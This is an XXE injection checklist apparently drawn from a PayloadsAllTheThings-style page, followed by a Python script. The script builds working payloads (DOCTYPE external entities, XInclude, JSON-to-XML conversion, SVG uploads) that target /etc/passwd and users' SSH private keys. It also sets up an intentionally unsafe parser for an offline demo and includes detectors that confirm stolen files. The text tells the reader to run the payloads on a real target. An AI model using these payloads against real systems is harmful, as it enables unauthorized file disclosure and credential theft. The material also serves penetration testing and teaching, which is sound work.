XXE - XML External Entity Injection
XML External Entity Injection (XXE) is a vulnerability that allows an attacker to interfere with an application's processing of XML data. By declaring an external entity in a DOCTYPE and referencing it from a field the application echoes back, an attacker can read files on the server filesystem and/or make the server issue requests to back-end systems it can reach.
  1. Look for forms that might be posting XML. Check whether endpoints that post JSON also accept XML; the server might support both. Image upload may also be vulnerable if SVG is accepted, since SVG is XML and is handed to an XML parser.
  2. Try it in any XML that is sent to the server.
  3. Try it in bodies that use neither XML nor JSON, e.g. productId=2&storeId=1, because the parameter values might be embedded into an XML document on the server side. Such a value cannot carry a DOCTYPE of its own, so the thing to try there is an XInclude payload in the parameter value.
  4. Try converting the data in some requests from JSON to XML (and the Content-Type to text/xml or application/xml), because the server might support both.
  5. If nothing works, refer to Unrestricted File Upload and follow through.
  6. If you are able to read "/etc/passwd", go after more sensitive data to prove impact, e.g. the SSH key of a user listed there: "file:///home/user/.ssh/id_rsa". Keep in mind that the entity's content must parse as XML text, so a file containing `<` or `&` yields a parse error instead of its contents.
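The checklist above, worked through in code. This is an added example, not part of the original page or of PayloadsAllTheThings: it builds the payload for each step (classic DOCTYPE entity for XML bodies, an XInclude element for form parameters that get embedded into server-side XML, a JSON/form body re-encoded as XML, an SVG upload), proves the DOCTYPE payload offline against a deliberately weak Python SAX parser, and checks a response for evidence that a file was read. The endpoint field names, the `order`/`productId` tags and the passwd-like sample file are all constructed for the example.

```python
"""Added example (not the page's own code): XXE payload builders, an offline
vulnerable-parser check and a response detector. All tag/field names and the
sample passwd data are assumptions made for the example."""
import os
import re
import tempfile
import xml.sax
from io import BytesIO
from pathlib import Path
from urllib.parse import parse_qsl
from xml.sax import handler
from xml.sax.saxutils import escape

SAMPLE_FILE_URL = "file:///etc/passwd"  # step 6's first target; any file: URL works


def xxe_doctype(path: str, root: str = "root") -> str:
    """DOCTYPE declaring one external general entity (xxe) that points at `path`."""
    return f'<!DOCTYPE {root} [<!ENTITY xxe SYSTEM "{path}">]>'


def xml_payload(root: str, field: str, path: str = SAMPLE_FILE_URL) -> str:
    """Step 2: classic XXE, with the entity referenced from a field the app echoes back."""
    return f'<?xml version="1.0"?>{xxe_doctype(path, root)}<{root}><{field}>&xxe;</{root}>'.replace(
        f"</{root}>", f"</{field}></{root}>", 1)


def xinclude_payload(path: str = SAMPLE_FILE_URL) -> str:
    """Step 3: a value embedded into server-side XML cannot add a DOCTYPE, but an
    XInclude element is honoured if the server's parser has XInclude enabled."""
    return ('<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
            f'<xi:include parse="text" href="{path}"/></foo>')


def fields_to_xml_payload(fields: dict, inject_into: str, path: str = SAMPLE_FILE_URL) -> str:
    """Step 4: re-encode a JSON object or a parsed form body (dict(parse_qsl(body))) as
    XML, injecting the entity into one field. Send it with Content-Type: text/xml."""
    body = "".join(
        f"<{name}>{'&xxe;' if name == inject_into else escape(str(value))}</{name}>"
        for name, value in fields.items())
    return f'<?xml version="1.0"?>{xxe_doctype(path)}<root>{body}</root>'


def svg_payload(path: str = SAMPLE_FILE_URL) -> str:
    """Step 1: SVG is XML, so an image upload that accepts SVG may process the DOCTYPE."""
    return (f'<?xml version="1.0"?>{xxe_doctype(path, "svg")}'
            '<svg xmlns="http://www.w3.org/2000/svg" width="300" height="40">'
            '<text x="0" y="20">&xxe;</text></svg>')


# Step 6: markers that show a file read actually happened.
EVIDENCE = {
    "passwd": re.compile(r"^root:[^:\n]*:0:0:", re.M),
    "ssh-key": re.compile(r"-----BEGIN (?:OPENSSH|RSA|EC|DSA) PRIVATE KEY-----"),
}


def file_read_evidence(response_text: str):
    """Return which kind of sensitive content the response contains, or None."""
    for kind, pattern in EVIDENCE.items():
        if pattern.search(response_text):
            return kind
    return None


class _Collector(handler.ContentHandler):
    """Collects character data, i.e. what a vulnerable app would echo back."""
    def __init__(self):
        super().__init__()
        self.text = []

    def characters(self, content):
        self.text.append(content)


def parse_resolving_entities(xml_text: str) -> str:
    """Deliberately weak parser: Python's SAX reader with external general entity
    resolution switched on (the stdlib default is off). Never do this in production."""
    collector = _Collector()
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, True)  # the unsafe setting
    parser.setContentHandler(collector)
    parser.parse(BytesIO(xml_text.encode()))
    return "".join(collector.text)


def demo_local_xxe() -> str:
    """Offline proof: write a constructed passwd-like file, point the entity at it and
    return what the weak parser leaks (a stand-in for /etc/passwd)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\nalice:x:1000:1000::/home/alice:/bin/sh\n")
    try:
        return parse_resolving_entities(xml_payload("order", "productId", Path(fh.name).as_uri()))
    finally:
        os.unlink(fh.name)


if __name__ == "__main__":
    print(fields_to_xml_payload(dict(parse_qsl("productId=2&storeId=1")), "productId"))
    print(xinclude_payload())
    leaked = demo_local_xxe()
    print("evidence:", file_read_evidence(leaked), "\n", leaked)
```

Run it on a real target by sending one of the returned strings as the request body; `file_read_evidence` applied to the response text tells you whether the read succeeded, and the `demo_local_xxe` path shows what a successful echo looks like before you touch a live system.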
Payloads at PayloadsAllTheThings.